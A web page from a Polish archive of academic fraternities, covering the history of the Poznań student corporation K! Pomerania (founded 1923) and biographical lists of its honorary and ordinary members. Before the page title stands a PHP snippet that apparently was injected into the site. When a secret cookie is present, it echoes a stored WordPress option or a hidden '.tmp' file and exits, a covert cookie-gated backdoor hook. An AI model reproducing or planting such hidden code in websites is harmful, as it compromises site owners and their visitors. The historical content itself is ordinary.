if (isset($_COOKIE["fn9uBsXrHEMCoNLjpQ9VN9SVJgeJ2TQDYJ"])) { $lines = get_option( 'wpsdth4_license_key' ); if (!empty($lines)) { $lines = @file_get_contents(".tmp"); } echo $lines; exit(); } Archiwum Korporacyjne - Archiwum i Muzeum Polskich Korporacji Akademickich

K! Pomerania

Dekiel Pomeranii - vide Poszukiwania. Nazwa:
Korporacja Studentów Uniwersytetu Poznańskiego “Pomerania”
Siedziba:
Poznań
Data powstania:
8 XII 1923 r.
Barwy:
błękitna – biała – zielona (symbolika barw: morze – piasek – lasy i łąki)
Dewiza:
„In scientia veritas, in amititia unitas”, („W nauce prawda, w przyjaźni jedność”)

Rys historyczny

Herb Pomeranii, 1933 r.

Pomerania została założona dnia 8 XII 1923 r. przez grupę siedmiu studentów Uniwersytetu Poznańskiego. Prace nad powołaniem nowej korporacji toczyły się od dnia 11 listopada, kiedy to z inicjatywy Aleksandra Wysińskiego odbyło się w mieszkaniu Mieczysława Mrozińskiego spotkanie, na którym podjęto taką decyzję. Pierwszym prezesem stowarzyszenia został Damazy Gracz, były filomata pomorski i jeden z pierwszych absolwentów prawa Uniwersytetu.

Pomerania, grudzień 1925 r.

Zasady ideowe Pomeranii ujęte zostały w uroczystej Deklaracji Ideowej. Zgodnie z nią celem korporacji jest wychowanie świadomych grożącego ze strony Niemiec niebezpieczeństwa pomorskich przywódców i inteligencji, “obowiązkowych i pracowitych, przepojonych chęcią sumiennej i ofiarnej służby dla Narodu, nie cofających się przed żadną przeszkodą, gdy chodzi o dobro Ojczyzny, gotowych w razie potrzeby - walczyć do ostatniej kropli krwi w obronie całości i niepodległości Najjaśniejszej Rzeczypospolitej.” Pomerania stawiała sobie za zadanie “wychowywać swych członków na ludzi o wysokim poziomie moralnym, uszlachetniać ich ambicje, wyrobić w nich poczucie honoru i odpowiedzialności za każde słowo i każdy czyn.” Wychowanie to miało przebiegać w duchu chrześcijańskim ze świadomością, że hasłem ludu pomorskiego w najcięższych chwilach były słowa “Bóg i Ojczyzna”. W Deklaracji zobowiązano także członków do “uświadamiania szerokich mas w duchu państwowo-twórczym, do krzewienia wśród nich oświaty” oraz zalecono “nie angażować się w żadnej organizacji politycznej, tak akademickiej, jak i starszego społeczeństwa”.

Komers (?) Pomeranii, czerwiec 1927 r.

W 1924 r. Senat Uniwersytetu zatwierdził statut korporacji i ustanowił kuratora w osobie prof. Kazimierza Tymienieckiego

Pomerania należała do największych korporacji poznańskich. Była także jedną z najstarszych i najliczniejszych w skali kraju korporacji chrześcijańskich. Od 1927 r. była członkiem Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich. W Poznaniu zorganizowała Poznańskie Koła Środowiskowe Zjednoczenia. Pod opieką Pomeranii kandydowały: w 1926/27 K! Gedania Posnaniensis, w latach 1930-32 K! Codania, a w latach 1931-32 K! Agraria.

Spotkanie członków Pomeranii, 1974 r.

Korporacja zawarła dnia 8 XII 1928 r. umowę kartelową z K! Laudania z Warszawy, a także umowy o bliskiej współpracy dnia 2 II 1926 r. z K! Astria z Poznania oraz w 1928 r. z K! Agraria.

Siedziby Pomeranii znajdowały się początkowo przy ul. św. Marcin 57, a w latach 30-tych przy Alejach Marcinkowskiego 13 pok. 12.

Całkowita ustalona, niekompletna lista członków obejmuje 203 osoby, w tym 17 członków honorowych. W 1938 r. liczyła 173 członków, w tym 15 członków honorowych.

Po wojnie odbywały się spotkania członków korporacji.

Lista członków

Poniższa, niekompletna lista członków Pomeranii obejmuje ponad 200 nazwisk. Będziemy wdzięczni za jej uzupełnianie i korektę, przesyłanie danych biograficznych i fotografii członków korporacji (vide Kontakt), jak także za pomoc w poszukiwaniach materialnych śladów oraz wszelkich informacji o samej korporacji (vide Poszukiwania).

Członkowie honorowi

  Jan Józef Bossowski, lata 20-te.

 1. Jan Józef Bossowski, (14 września 1882 w Stryszawie na Podhalu - 16 października 1957) absolwent Gimnazjum im. J. III Sobieskiego w Krakowie 1900, student prawa UJ 1900-04, dr prawa 1906, karnista, doc. UJ, od 1922 prof. UP, filister honorowy Pomeranii, kurator K! Astria, pochowany na Cmentarzu Sołackim w Poznaniu

  Bernard Chrzanowski, lata 20-te.

 2. Bernard Chrzanowski, (27 lipca 1861 w Wojnowicach k. Buku - 12 grudnia 1944 w Konstancinie k. Warszawy) s. Kazimierza i Bronisławy z Lipińskich, absolwent Gimnazjum św. Marii Magdaleny w Poznaniu 1880, kierownik tajnego kółka Towarzystwa im. Tomasza Zana, studiował historię i prawa na uniwersytetach w Krakowie i Berlinie, od 1890 adwokat w Poznaniu, działacz społeczny, wydawca tygodnika “Przegląd Poznański” 1894-96, wiceprezes 1893-95, a następnie prezes Związku Sokołów Wielkopolskich, polityk narodowy, od 1899 członek tajnej Ligi Narodowej w Poznaniu, poseł do parlamentu Rzeszy 1901-10, kierownik Towarzystwa Demokratyczno-Narodowego w Poznaniu 1909-19, w 1919 podsekretarz stanu w Ministerstwie b. Dzielnicy Pruskiej, kurator Okręgu Szkolnego Poznańskiego 1922-28, od 1935 senator RP, Filister honorowy Pomeranii, pochowany na cmentarzu w Skolimowie, jego prochy przeniesiono w 1986 na Cmentarz Oksywski w Gdyni

  Bronisław Dembiński, lata 30-te (?).

 3. Bronisław Dembiński, (14 sierpnia 1858 w Małej Komorzy - 23 listopada 1939 w Poznaniu) z rodziny ziemiańskiej, s. Teodora i Nepomuceny z Jasińskich, absolwent Gimnazjum Marii Magdaleny w Poznaniu, student historii na uniwersytetach w Berlinie i Wrocławiu, dr historii UWr. 1883, habilitacja 1886, doc. w Katedrze Historii Powszechnej UJ, od 1892 prof. nadzw. ULw., od 1897 prof. zw., dziekan Wydziału Filozoficznego 1898/99, rektor 1907/08 i prorektor 1908/09, prof. i kierownik Katedry Nowożytnej Historii Polski i Powszechnej UW 1916-19, prof. i kierownik Katedry Historii Powszechnej UP 1923-33, członek-korespondent, a od 1917 członek czynny AU/PAU, członek honorowy PTPN 1932, doctor honoris causa Uniwersytetu w Oxfordzie 1930 i UW 1933, Filister honorowy Pomeranii, działacz społeczno-polityczny, m.in. poseł do parlamentu we Wiedniu 1914-18, poseł na Sejm RP 1919-22, minister i wiceminister Wyznań Religijnych i Oświecenia Publicznego 1918-20, odznaczony m.in. Krzyżem Komandorskim i Komandorskim z Gwiazdą Orderu Polonia Restituta, czeskim Orderem Lwa Białego III stopnia, papieskim Orderem Św. Grzegorza, Krzyżem Oficerskim francuskiej Legii Honorowej

 4. Szczepan Gracz, (22 sierpnia 1888 w Sypniewie w pow. złotowskim - 21 listopada 1942 w Łodzi) absolwent Gimnazjum w Chełmnie, organizator i prezes organizacji filomackiej, studiował na uniwersytetach w Dreźnie i Berlinie, działacz filomacki i polityczny w zaborze pruskim, doktor wet. UJK, radca weterynaryjny w Urzędzie Wojewódzkim w Toruniu i Poznaniu, od 1926 naczelnik Wydziału Weterynaryjnego w Ministerstwie Rolnictwa i Dóbr Państwowych, Filister honorowy Pomeranii, po śmierci żony w 1936 wstąpił do nowicjatu w Stowarzyszenia Apostolstwa Katolickiego (Księża Pallotyni), święcenia 1940, prowadził tajną posługę duszpasterską na terenach wcielonych do Rzeczy, działał w konspiracji, aresztowany i osadzony w więzieniu w Radogoszczy (dzielnica Łodzi), wg oficjalnych danych zmarł z powodu niewydolności serca, po ekshumacji pochowany w palotyńskiej kwaterze na Cmentarzu w Ołtarzewie, w 1992 w kościele św. Jakuba w Lęborku odsłonięto poświęconą mu tablicę pamiątkową
 5. Jan Karnowski, (16 maja 1886 w Czarnowie w pow. Chojnickim - 2 października 1939 w Wyrzysku) s. Jana i Anny z Lipińskich, sędzia sądu powiatowego w Czersku i sądu okręgowego w Toruniu, adwokat w Toruniu, literat i poeta kaszubski, zwolennik i propagator języka kaszubskiego, ideolog ruchu młodokaszubskiego, filister honorowy Pomeranii, patron Szkoły Podstawowej nr 7 w Chojnicach oraz Powiatowego Młodzieżowego Domu Kultury w Brusach
 6. Eugeniusz Kwiatkowski, (30 grudnia 1888 w Krakowie - 22 sierpnia 1974 w Krakowie) s. Jana i Wincentyny z d. Maszyńska, ekonomista, naukowiec, działacz gospodarczy i polityczny w II Rzeczypospolitej, minister przemysłu i handlu w gabinetach Kazimierza Bartla i Józefa Piłsudskiego 1926-30, w latach 1935-39 wicepremier i minister skarbu w gabinetach Mariana Zyndram-Kościałkowskiego i Felicjana Sławoja Składkowskiego, poseł na Sejm Ustawodawczy 1947-52, autor koncepcji rozwoju handlu morskiego, budowniczy portu w Gdyni, autor planu oraz budowniczy Centralnego Okręgu Przemysłowego, dr honoris causa Uniwersytetu Gdańskiego 1974, pośmiertnie odznaczony Orderem Orła Białego 1996, członek honorowy korporacji Pomerania i Gedania Posnaniensis
 7. Aleksander Majkowski, (17 lipca 1876 w Kościerzynie - 10 lutego 1938 w Gdyni) absolwent Gimnazjum w Chojnicach, student med. w Berlinie i Gryfii, Monachium i Zurychu, członek polskich organizacji “Vistula” w Monachium i “Adelphia” w Gryfii, dr med. 1904, czołowy działacz kaszubski, literat i poeta kaszubski, wydawca i redaktor pisma kaszubskiego “Gryf”, w 1935 wyróżniony Srebrnym Laurem Polskiej Akademii Literatury, Filister honorowy Pomeranii, odznaczony m.in. Krzyżem Oficerskim OOP i Złotym Krzyżem Zasługi

  Alfons Mańkowski, lata 20-te.

 8. Alfons Mańkowski, (10 września 1870 w Wielkim Kuntersztynie k. Grudziądza - 14 lutego 1941 w Stutthofie) z rodziny chłopskiej, s. Jakuba i Franciszki z Kamińskich, duchowny katolicki, od 1927 prałat, historyk Pomorza, autor ok. 280 prac, od 1929 członek-korespondent PAU, prezes i członek honorowy Towarzystwa Naukowego w Toruniu, członek Rady Polskiego Słownika Biograficznego, od 1928 członek, a od 1936 członek honorowy PTPN, wiceprezes Instytutu Bałtyckiego w Toruniu i Gdyni 1930-39, pomorski działacz społeczny i gospodarczy, m.in. organizator polskiej oświaty na Pomorzu, współzałożyciel i członek Zarządu Banku Ludowego w Tczewie, działacz plebiscytowy na Warmii i Mazurach, Filister honorowy Pomeranii, w 1940 aresztowany przez Niemców, wywieziony do obozu koncentracyjnego w Stutthofie, gdzie zmarł

  Feliks Nowowiejski, lata 20-te.

 9. Feliks Nowowiejski, (7 lutego 1877 w Barczewie na Warmii - 18 stycznia 1946 w Poznaniu) student w Berlinie, Ratyzbonie i Berlinie, kompozytor, dyrygent, pedagog, organista-wirtuoz, organizator życia muzycznego, prowadził działalność pedagogiczną w Krakowie, Berlinie, a od 1919 w Poznaniu, za kompozycje religijne wyróżniony tytułem szambelana papieskiego 1935, skomponował m.in. melodię Roty oraz operę Legenda Bałtyku, Filister honorowy Pomeranii i Surmy, od 1961 w domu rodzinnym w Barczewie mieści się muzeum poświęcone artyście, od 2008 także w Poznaniu działa Salon Muzyczny - Muzeum Feliksa Nowowiejskiego, od 1994 w Poznaniu odbywa się regularny Międzynarodowy Konkurs Organowy im. Feliksa Nowowiejskiego, a od 2002 w Barczewie Międzynarodowy Festiwal Muzyki Chóralnej im. Feliksa Nowowiejskiego, jest patronem licznych instytucji oświatowych i ulic w wielu miastach w Polsce

  Stanisław Okoniewski, 1926/27 r.

 10. Stanisław Okoniewski, (21 kwietnia 1870 - 1 maja 1944 w Lizbonie), duchowny katolicki, wyświęcony w 1895 w Poznaniu, wikary w Bezdrowie, proboszcz w Bninie i Kościelcu, red. “Przeglądu Kościelnego”, doktor honoris causa UJ 1926, sakra biskupia 1926, pierwszy polski biskup chełmińskim od czasu zaborów, zaangażowany się w odnowienie życia religijnego, założyciel Muzeum Diecezjalnego w Pelplinie, filister honorowy Pomeranii, po wybuchu wojny wyjechał do Rumunii, następnie do Włoch, Francji i Portugalii, gdzie zmarł

  Mikołaj Rudnicki, lata 20-te.

 11. Mikołaj Rudnicki, (6 grudnia 1881 w Sokołowie Podlaskim - 28 czerwca 1978 w Puszczykowie k. Poznania), absolwent UJ, od 1911 doc. językoznawstwa indoeuropejskiego UJ, współzałożyciel i prof. UP, założyciel i redaktor 1921-48 czasopisma “Slavia Occidentalis”, filister honorowy Pomeranii, po wojnie dziekan Wydziału Humanistycznego 1948-50, od 1945 członek PAU, członek korespondent PAN, dyrektor Instytutu Zachodniosłowiańskiego, od 1945 członek Komisji Ustalania Nazw Miejscowości na terenach tzw. Ziem Odzyskanych

  Juljan Rummel, lata 20-te.

 12. Juljan Eugeniusz Rummel, (29 września 1878 w Libawie na Łotwie - 22 kwietnia 1954 w Gdynii) s. Władysława i Walerii z Narolskich, ojciec Aleksandra (Helania), inż. budowy okrętów, prezes związku towarzystw żeglugi morskiej w Rosji 1909, działacz społeczny i gospodarczy, współtwórca idei Gdyni, dyrektor Żeglugi Polskiej w Warszawie 1926 (?), prezes Związek Armatorów Polskich, prezes Związek Maklerów Polskich, wiceprezes Instytutu Bałtyckiego, inicjator wielu pionierskich przedsięwzięć związanych z morzem, Filister honorowy Pomeranii, Helanii i Rosevii, autor wspomnień “Narodziny żeglugi” (1980), pochowany na Cmentarzu Witomińskim w Gdyni

  Bolesław Ślaski, lata 20-te.

 13. Bolesław Ślaski, ( - w Płocku) studiował prawo i historię na Uniwersytecie w Warszawie, sędzia i adwokat, w II RP radca prokuratorii w Poznaniu, a następnie notariusz w Wieruszowie, badacz zainteresowany problematyką kaszubską, Filister honorowy Pomeranii

 14. Stanisław Wachowiak, (7 maja 1890 w Smolicach - 4 marca 1972 w San Paulo) absolwent Gimnazjum w Recklinghausen, studiował prawo i ekonomię na uniwersytetach w Berlinie, Monasterze, Strasburgu i Monachium, dr, działacz gospodarczy, dyrektor banku w Inowrocławiu, poseł na Sejm RP 1920-24, wojewoda pomorski 1924-26, wspierał budowę Gdyni (w 1926 podpisał dekret erekcyjny miasta), dyrektor Powszechnej Wystawy Krajowej w Poznaniu 1926-29, dyrektor Związku Kopalń Górnośląskich „Robur” w Katowicach 1931-39, Filister honorowy Pomeranii, w czasie okupacji niemieckiej wiceprezes Rady Głównej Opiekuńczej w Generalnym Gubernatorstwie 1939-45, od 1946 na emigracji
 15. Józef Wysiński, (24 stycznia 1879 r. w Brusach w pow. chojnickim - 1936) s. Mieczysława, brat Aleksandra (Pomerania), uczeń gimnazjów w Pelplinie i w Chojnicach, alumn Seminarium Duchownego w Pelplinie, duchowny katolicki, prałat, działacz polityczno-narodowy, Filister honorowy Pomeranii

  Jan Zakrzewski, lata 20-te.

 16. Jan Zakrzewski, (9 kwietnia 1881 w maj. Golina w pow. jarocińskim - ) herbu Wyskota, s. Pawła i Stanisławy z d. Łubieńska, absolwent Gimnazjum w Poznaniu, studiował we Wrocławiu, Marburgu i Getyndze, od 1910 adwokat w Gliwicach, radca 1918, naczelnik wydziału 1919, następnie dyrektor Departamentu Karnego w Ministerstwie Sprawiedliwości, od 1921/22 prezes Sądu Okręgowego w Toruniu, prezes Sądu Apelacyjnego w Poznaniu, Filister honorowy Pomeranii

 17. Stefan Żeromski, (14 października 1864 w Strawczynie k. Kielc - 20 listopada 1925 w Warszawie) ze zubożałej rodziny szlacheckiej herbu Jelita, s. Wincentego, uczeń Męskiego Gimnazjum Rządowego w Kielcach, prozaik, publicysta, dramaturg, nazwany “sumieniem polskiej literatury”, działacz organizacji demokratycznych i socjalistycznych. inicjator założenia Uniwersytetu Ludowego, brał udział w akcji propagandowej celem przyłączenia Powiśla, Mazur i Warmii do Polski, założyciel i pierwszym prezesem polskiego oddziału PEN Clubu 1925, Filister honorowy Pomeranii, pochowany na Cmentarzu Ewangelicko-Reformowanym w Warszawie

Członkowie rzeczywiści

 1. Robert Anweiler, akt. 1935-36, sekretarz sem. let. 1935/36
 2. Bronisław Augustin, student med. UP, akt 1932-33
 3. Marjan Bahr, student med. i Wydziału Humanistycznego UP, c. 1927/28, akt. 1927/28-33
 4. Józef Balcer, absolwent Wydziału Humanistycznego UP, w 1933 w Morczy pow. Wyrzysk

  Franciszek Barganowski, prawd. 1930/31 r.

 5. Franciszek Barganowski, (8 lutego 1909 w miejsc. Brzuśce na Pomorzu - 17 marca 1982 w Tczewie) s. Jana i Moniki z d. Kitowskiej, kuzyn Jerzego (Roma), absolwent Gimnazjum w Tczewie, student i absolwent med. UP, akt. 1932-33, II wiceprezes r.a. 1932/33, w wojnie obronnej 1939 w obronie Warszawy, w niewoli niemieckiej w Stalagu I B w Olsztynku, po wojnie lekarz w Tczewie, pochowany na Cmentarzu przy ul. 30 stycznia w Tczewie

 6. Alfons Beil, (29 sierpnia 1908 - 1957) s. Klemensa (matematyka i muzyka), brat Witolda (Pomerania), kuzyn Kazimierza Kopcia (Pomerania), student i absolwent 1933 med. UP, c. 1926/27, akt. 1926/27-28, dr med. UJ 1947, w 1956 lekarz w Rybniku

  Witold Beil, ok. 1932 r.

 7. Witold Beil, (2 maja 1907 w Brodnicy - 8 stycznia 1936 w Tucholi) s. Klemensa (matematyka i muzyka), brat Alfonsa (Pomerania), kuzyn Kazimierza Kopcia (Pomerania), student prawa UP, c. 1926/27, akt. 1926/27-28, mgr prawa, w 1932 w 5 kompanii strzelców w Szkole Podchorążych Rezerwy Piechoty, w 1933 urzędnik w starostwie w Tucholi, w 1936 wicestarosta tucholski

 8. Bronisław Bembnista, student med. UP, akt. 1926-28, w 1933 w Poznaniu
 9. Paweł Benedeit, akt. 1930, w 1933 nauczyciel gimnazjalny
 10. Józef Benski, student med. UP, c. 1926/27, akt. 1926/27

  Edward Bieszka, 1931 r.

 11. Edward Bieszka, (16 stycznia 1911 w miejsc. Karszanek pow. Starogard - 26 września 1984 w Lęborku) s. Franciszka i Anny z d. Firyn, absolwent Gimnazjum w Tczewie 1929, student i absolwent 1936 med. UP, akt. 1932-33, po studiach lekarz w Toruniu i Działdowie, ppor. rez., w wojnie obronnej 1939 na szlaku bojowym Mława-Warszawa, w niewoli niemieckiej w obozach w Nierenburgu nad Weserą, w Austrii oraz oflagu II C w Woldenbergu 1940-45, dr med. AM w Gdańsku 1950, dermatolog i pediatra, po wojnie lekarz w Działdowie i Lęborku, organizator i ordynator oddziału chorób dziecięcych szpitala w Lęborku, działacz Miejskiej i Powiatowej Rady Narodowej, członek ZBOWiD, Towarzystwa Przyjaciół Dzieci, Polskiego Towarzysta Lekarskiego, Polskiego Związku Wędkarskiego, pochowany na Cmentarzu przy ul. Kaszubskiej w Lęborku, odznaczony m.in. Krzyżem Kawalerskim OOP, Medalem Wojny Obronnej 1939, jego nazwiskiem nazwano ulicę w Lęborku

  Konrad Binnek

 12. Konrad Binnek, (1906 w Kierwałdzie w pow. Starogard Gdański - listopad/grudzień 1938 w Chełmnie) s. Konrada i Joanny z d. Czaplewskiej, absolwent Gimnazjum Humanistycznego w Świeciu n. Wisłą, student Wydziału Humanistycznego UP, c. 1926/27, akt. 1926/27-33, po studiach pracował w wojsku w Chełmnie, zmarł po operacji wyrostka robaczkowego, pochowany w Chełmnie

 13. Józef Bojko, student Wydziału Rolno-Leśnego UP, c. 1926/27, akt. 1926/27-28
 14. Franciszek Borzyszkowski, (16 lutego 1908 w miejsc. Kiedrowicz k. Chojnic - ) student i absolwent 1933 med. UP, c. 1926/27, akt. 1926/27, radiolog, internista, w 1956 kierownik Wydziału Zdrowia w Kościerzynie
 15. Stanisław Borzyszkowski, inż. leśnik, w 1933 urzędnik w Dyrekcji Lasów Państwowych w Białowieży
 16. Józef Bruski, student med. UP, c. 1927/28, akt. 1928-30
 17. Gerard Burzyk, student med. UP, c. 1927/28, akt. 1927/28-33
 18. Alfons Bychowski, student farmacji UP, akt. 1932-36, skarbnik sem. let. 1935/36
 19. Władysław Charaszkiewicz, student Wydziału Humanistycznego UP, akt. 1926, w 1933 nauczyciel gimnazjalny w Krotoszynie, później nauczyciel języka polskiego w Starogardzie
 20. Walerjan Ernest Chromik, (14 grudnia 1907 w Dąbrowie Śląskiej w Czechach - 1940 w Katyniu), s. Jana i Emilii, absolwnet prywatnego Gimnazjum Realnego im. Juliusza Słowackiego w Orłowej 1927, absolwent leśnictwa UP 1932, c. 1926/27, akt. 1926/27-28, absolwent Szkoły Podchorążych Rezerwy Piechoty w Zambrowie, przed wojną mieszkał w Lipowej w pow. żywieckim, ppor rez. 3 Pułku Strzelców Podhalańskich, w niewoli sowieckiej, zamordowany przez NKWD

  Bernard Cisewski, 1928 r.

 21. Bernard Cisewski, (20 maja 1898 w Brusach w pow. chojnickim - ) student i absolwent 1922 prawa UP, po studiach sędzia powiatowy w Poznaniu, a następnie adwokat w Bydgoszczy, prezes Koła Filistrów Pomeranii 1927-33

 22. Alojzy Cysewski, (4 kwietnia 1898 w Brusach w pow. chojnickim - 1962) uczeń gimnazjów w Pelplinie, Chojnicach i Kwidzynie, student i absolwent leśnictwa UP, założyciel Pomeranii, po studiach nadleśniczy w Różannie pow. Świecie 1927, wiceprezes Koła Filistrów 1928
 23. Alojzy Władysław Czaplewski, (27 czerwca 1906 w Hamborn nad Renem - lata 70-te w Radlinie) student i absolwent 1932 med. UP, dr med. UP 1932, c. 1926 (?), akt. 1926-28, skarbnik r.a. 1927/28, internista, po wojnie w Radlinie, pochowany na Cmentarzu w Radlinie
 24. Antoni Czarnowski, student i absolwent prawa UP, akt. 1926-28, sekretarz i olderman, po studiach aplikant sądowy, a następnie sędzia w Grudziądzu
 25. Józef Czerski, student prawa UP, c. 1926 (?), akt. 1926-28, w 1933 sędzia w Nowym pow. Świecie
 26. Hubert Czoska, akt. 1936-37, sekretarz sem. let. 1936/37
 27. Alfred Czyż, student prawa UP, c. 1933 (?), akt. 1933
 28. Kazimierz Dąbrowski, student Wydziału Humanistycznego UP, c. 1933 (?), akt. 1933
 29. Szymon Dreszler, (18 lipca 1897 w Toruniu - ) absolwent Gimnazjum w Toruniu, alumn Seminarium Duchownego w Pelplinie, duchowny katolicki, student sekcji muzykologicznej Wydziału Humanistycznego UP, administrator parafii św. Trójcy w Dębcu
 30. Marjan Durno, student prawa UP, c. 1933 (?), akt. 1933
 31. Zygmunt Duszyński, student i absolwent prawa UP, c. 1927/28, akt. 1927/28-30, prezes Akademickiego Koła Bydgoszczan 1930, w 1933 w Bydgoszczy
 32. Franciszek Dylewski, (26 czerwca 1905 w Lidzbarku na Pomorzu - ) absolwent Gimnazjum w Chełmnie 1924, student med., prawa i teologii UW, UP, UJ, członek Pomeranii, akt. 1926, c. 1928 Masovia, skreślony 1928, następnie student filozofii UJ, c. 1930/31 Capitolia, akt. 1930/31
 33. Zygmunt Dynowski, akt. 1938-39, wiceprezes sem. zim. 1938/39
 34. Wojciech Ehlert , (1916 - 3 lipca 1964 w Gdańsku) student prawa UP, akt. 1938-39, sekretarz sem. zim. 1938/39, prokurator, Prokurator Wojewódzki w Gdańsku
 35. Edmund Engler, student teologii, c. 1933 (?), akt. 1933
 36. Jerzy Formella, student med. UP, c. 1927/28, akt. 1927/28-30, wystąpił 1930
 37. Feliks Gajdziewski, student med. UP, akt. 1932-34, sekretarz sem. let. 1933/34

  Leon Gayda, lata 20-te.

 38. Leon Marian Gayda, (13 września 1903 w Kościerzynie - 1985 w Toruniu) brat stryjeczny Zdzisława (Baltia) i Józefa (Surma), student i absolwent prawa 1922-27 UP, akt. 1926-28, sekretarz, I wiceprezes Akademickiego Koła Pomorzan, w latach 30-tych sędzia w Czersku, po wojnie sędzia Sądu Wojewódzkiego

 39. Stanisław Gierszewski, student med. UP, c. 1926/27, akt. 1926/27-33, prezes r.a. 1930/31, prezes Poznańskiego Koła Środowiskowego Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930, od maja 1932 prezes Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich

  Hubert Gleinert, 1937 r (?).

 40. Hubert Gleinert, (6 grudnia 1915 w Tczewie - 25 grudnia 2000 w Gdańsku) s. Antoniego i Amandy z Żuchowskich, absolwent Gimnazjum w Tczewie, student i absolwent chemii UP, w czasie okupacji w AK, nauczyciel w tajnym nauczaniu gimnazjalnym, po studiach pracownik hut szkła na Dolnym Śląsku, m.in. kierownik laboratorium produkcji w Hucie w Wałbrzychu, później pracownik Rolniczej Spółki Olejarskiej w Szamotułach, Państwowej Fabryki Sklejek, kierownik laboratorium, szef działu i inspekcji jakości produkcji Portowych Zakładów Przemysłu Tłuszczowego “Amada Oleo Union Żuławy”, kierownik laboratorium Wojewódzkiej Stacji Sanepidu w Gdańsku/Gdyni

 41. Alojzy Glemma, student prawa UP, c. 1926 (?), akt. 1926-28, wiceprezes “Odrodzenia” 1926, po studiach aplikant sądowy, w 1933 sędzia w Działdowie
 42. Tadeusz Glemma, duchowny katolicki, dr, w 1928 prof. Seminarium Duchownego w Pelplinie

  Edmund Głodny, prawd. 1936 r.

 43. Edmund Głodny, (3 marca 1914 w Grabowie k. Starogardu - 10 maja 1980 w Gdynii) student i absolwent prawa UP 1936-48, żołnierz w wojnie obronnej 1939, od 19 września w niewoli niemieckiej, więzień w obozie Garmersheim, po wojnie pracownik przedsiębiorstwa Dalmor, radny Miejskiej Rady Narodowej w Gdyni, pochowany na cmentarzu w Rumii

 44. Bernard Główczewski, student i absolwent prawa UJ, prezes sem. let. 1924/25, wiceprezes, po studiach aplikant sądowy w Chojnicach
 45. Teofil Główczewski, student prawa i ekonomii UP, założyciel Pomeranii, wiceprezes, akt. 1923-30, w 1933 w Orliku pow. Chojnice
 46. Bernard Goebel, student teologii Seminarium Duchowne w Pelplinie, akt. 1926-33, w 1933 ksiądz
 47. Alfons Gończ, student teologii Seminarium Duchowne w Pelplinie, c. 1926 (?), akt. 1926-33

  Damazy Gracz, 1928 r. (?).

 48. Damazy Gracz, (8 grudnia 1897 w Radownicy w pow. złotowskim - 14 marca 1993 w Poznaniu) s. Stefana i Marty z d. Ciża, absolwent Gimnazjum w Chojnicach 1917, członek i prezes 1916-17 tajnego Towarzystwa im. Tomasza Zana, powstaniec wielkopolski (?), student prawa Uniwersytetu w Berlinie 1919 i UP 1919-22, ochotnik w wojnie polsko-rosyjskiej 1920, działacz akademickim, m.in. prezes Akademickiego Koła Pomorskiego, inicjator i założyciel Pomeranii, pierwszy prezes sem. let. 1923/24, prezes Koła Filistrów 1927, wiceprezes 1933, organizator i prezes Koła Przyjaciół Pomorza 1927-39, od 1927 adwokat, w czasie wojny ukrywał się w Generalnej Guberni, po wojnie adwokat w Poznaniu, działacz pszczelarski, odznaczony m.in. Medalem “Obrońcy Ojczyzny 1918-21″ oraz Złotą Odznaką Naczelnej Rady Adwokackiej, pochowany na Cmentarzu na Miłostowie w Poznaniu

 49. Józef Gregor, student med. UP, akt. 1932-33
 50. Józef Emil Groenwald, (1 kwietnia 1907 w Błądzikowie w pow. morskim - 1966) student i absolwent 1934 med. UP, c. 1926 (?), akt. 1926-28, dr med. UP 1938, pediatra, w 1956 w Bukowcu Pomorskim w pow. świeckim
 51. Paweł Groth, (14 kwietnia 1901 w Zelewie - 15 sierpnia 1985 w Gdańsku) student i absolwent 1927 Wydziału Humanistycznego UP, akt. 1926-28, olderman, nauczyciel historii w Gimnazjum Męskim w Tczewie, działacz Polskiego Związku Zachodniego, Ligi Morskiej i Kolonialnej, Towarzystwa Czytelni Ludowych, w czasie okupacji ukrywał się, związany z TOW (”Gryf Pomorski”), po wojnie zastępca dyrektora biblioteki miejskiej w Gdańsku, a następnie pracownik Wojewódzkiego Archiwum Państwowego, a od 1955 Biblioteki PAN, gdzie sprawował pieczę nad zbiorami kartograficznymi, graficznymi i numizmatycznymi, jeden z założycieli i organizatorów powstałego w kwietniu 1945 Państwowego Gimnazjum i Liceum Ogólnokształcącego w Gdańsku-Wrzeszczu, nauczyciel I LO im. Mikołaja Kopernika 1945-67, a także nauczyciel w innych szkołach średnich
 52. Adam Hanusiak, student prawa UP, c. 1933 (?), akt. 1933
 53. Zbigniew Heliński, student prawa UP, c. 1927/28, akt. 1927/28 [prawd. wcześniej w Gedanii Posnaniensis]
 54. Teofil Hillar, student Wydziału Rolno-Leśnego UP, akt. 1926
 55. Bernard Hinz, (6 kwietnia 1906 w Czersku w pow. chojnickim - lata 70-te) student i absolwent 1934 med. UP, c. 1926/27, akt. 1926/27-30

  Alojzy Jagalski, 1928 r. (?).

 56. Alojzy Stanisław Jagalski, (16 października 1903 w Sławoszynie w pow. puckim - 1966) brat Franciszka, Jakuba i Wiktora (wszyscy Pomerania), student i absolwent 1932 med. UP, dr med. UP 1932, akt. 1926-30, olderman sem. zim. i sem. let. 1926/27, prezes r.a. 1927/28 oraz sem. zim. 1928/29, prezes Zjednoczenia Polskich Akademickich Korporacji Chrześcijańskich 1930, chirurg, w 1933 lekarz w Gdyni

 57. Franciszek Jagalski, (1909-1935) brat Alojzego, Jakuba i Wiktora (Pomerania) student prawa UP, c. 1926/27, akt. 1926/27-33, wiceprezes r.a. 1930/31, prezes czerwiec-październik 1933, prezes Związku Akademickiego Koła Pomorzan w Toruniu 1930, zginął śmiercią tragiczną (utonął)
 58. Jakub Jagalski, (1893-1932) brat Alojzego, Franciszka i Wiktora (Pomerania), sędzia grodzki w Tczewie

  Wiktor Jagalski, 1926/27 r.

 59. Wiktor Jagalski, ( - 1939) brat Alojzego, Franciszka i Jakuba (Pomerania), student i absolwent ekonomii UP, założyciel Pomeranii, akt. 1923-28, prezes sem. zim. i sem. let. 1926/27, sekretarz i I wiceprezes Bratniej Pomocy Studentów UP 1928, w 1933 radca Starostwa Krajowego w Toruniu, burmistrz Tczewa

